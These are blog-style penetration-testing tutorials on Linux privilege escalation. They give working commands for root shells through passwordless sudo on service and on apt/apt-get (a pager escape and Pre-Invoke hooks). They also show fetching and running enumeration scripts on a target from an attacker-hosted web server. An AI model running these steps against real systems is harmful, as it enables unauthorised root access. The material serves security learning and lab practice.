VK9 Security

service – Privilege Escalation

by | Dec 27, 2019 | Linux Post-Exploitation

Sudo (NOPASSWD) service – Privilege Escalation

If you ever get to run “service” command with root privileges, you can escape from restricted shell to root.

In this example /etc/sudoers has allowed an user to run this program as root without password need.

How to

1. sudo -l

2. Now that we know the command can be run without password need

  • sudo service ../../../bin/bash

 

apt-get – Privilege escalation

by | Dec 24, 2019 | Linux Post-Exploitation

apt-get – Privilege escalation

apt-get can be used to escalate privileges when sudo is allowed without password.

How to

1. check the permissions this user has

  • sudo -l

We can see that /usr/bin/apt-get is allowed (NOPASSWD)

2. get into changelog documentation

  • sudo apt-get changelog apt

3. At the bottom type into change to /bin/bash since this document has been opened as root, seems to be “less” Linux utility.

  • !/bin/bash
  • <enter>

After that you immediately change to root log in.

Using apt-get & apt update for privilege escalation

(For this to work the target package (e.g., sl) must not be installed.)

  • TF=$(mktemp)
  • echo ‘Dpkg::Pre-Invoke {“/bin/sh;false”}’ > $TF
  • sudo apt-get install -c $TF sl

How to

1. Having NOPASSWD rights

  • sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/bash
  • whoami

If you type exit the apt-get update command starts to do its job.

2. using apt

  • sudo apt update -o APT::Update::Pre-Invoke::=/bin/bash

For using either apt or apt-get you need sudo access.

sudo -l

linux-exploit-suggester – Enumeration Linux kernelLinux-based machine

by | Dec 5, 2019 | Linux Post-Exploitation

LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine.

https://github.com/mzet-/linux-exploit-suggester

Execute

1. Download the tool

  • git clone https://github.com/mzet-/linux-exploit-suggester.git

  • cd
  • ls

2. Start python web server

  • python -m SimpleHTTPServer 9999

3. Download the script into the server

  • wget http://10.10.14.16:9999/linux-exploit-suggester
  • chmod a+x linux-exploit-suggester
  • ./ linux-exploit-suggester

For each exploit, exposure is calculated. Following ‘Exposure’ states are possible:

  • Highly probable – assessed kernel is most probably affected and there’s a very good chance that PoC exploit will work out of the box without any major modifications.
  • Probable – it’s possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
  • Less probable – additional manual analysis is needed to verify if kernel is affected.
  • Unprobable – highly unlikely that kernel is affected (exploit is not displayed in the tool’s output)

Example to further analyze the exploits

This is less probable so we need to confirm the info above.

libc6:2.23-ubuntu

Ubuntu=16.04.3

The info of the script matches config files and output of the server. It qualifies to be exploited.

LinEnum – Linux config enumeration

by | Dec 5, 2019 | Linux Post-Exploitation

The art of privilege escalation is a skill that any competent hacker should possess. It’s an entire field unto itself, and while it’s good to know how to perform the techniques involved manually, it’s often more efficient to have a script automate the process. LinEnum is one such script that can be incredibly useful for privilege escalation on Linux systems.

LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root.

https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Exploitation

1. Download LinEnum into Kali/Parrot machine

2. Access the directory LinEnum and start a python http server

  • cd LinEnum
  • ls
  • python -m SimpleHTTPServer 9999

3. Download the file LinEnum.sh into the target machine

  • cd /tmp

Other good candidates are:

/tmp

/dev/shm

/var/lock

/run/lock

  • wget http://10.10.14.10:9999/LinEnum.sh
  • ls -l

4. set the script permissions to be executable

  • chmod a+x LinEnum.sh
  • ls -l

5. Execute the script.

  • bash LinEnum.sh

Information starts to get collected. Analyze the output and see what is interesting.

Linux config enumeration – linuxprivchecker

by | Dec 5, 2019 | Linux Post-Exploitation

This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits.

https://github.com/sleventyeleven/linuxprivchecker

Execution

1. Download the script into Parrot/Kali machines

  • git clone https://github.com/sleventyeleven/linuxprivchecker.git

  • cd linuxprivchecker
  • ls
  • python -m SimpleHTTPServer 9999

2. Download the file into the target machine

  • wget http://10.10.14.10:9999/linuxprivchecker.py
  • chmod a+x linuxprivchecker.py

3. Execute the file locally in the target machine

  • python linuxprivchecker.py

Check the output and see what information is relevant for privilege escalation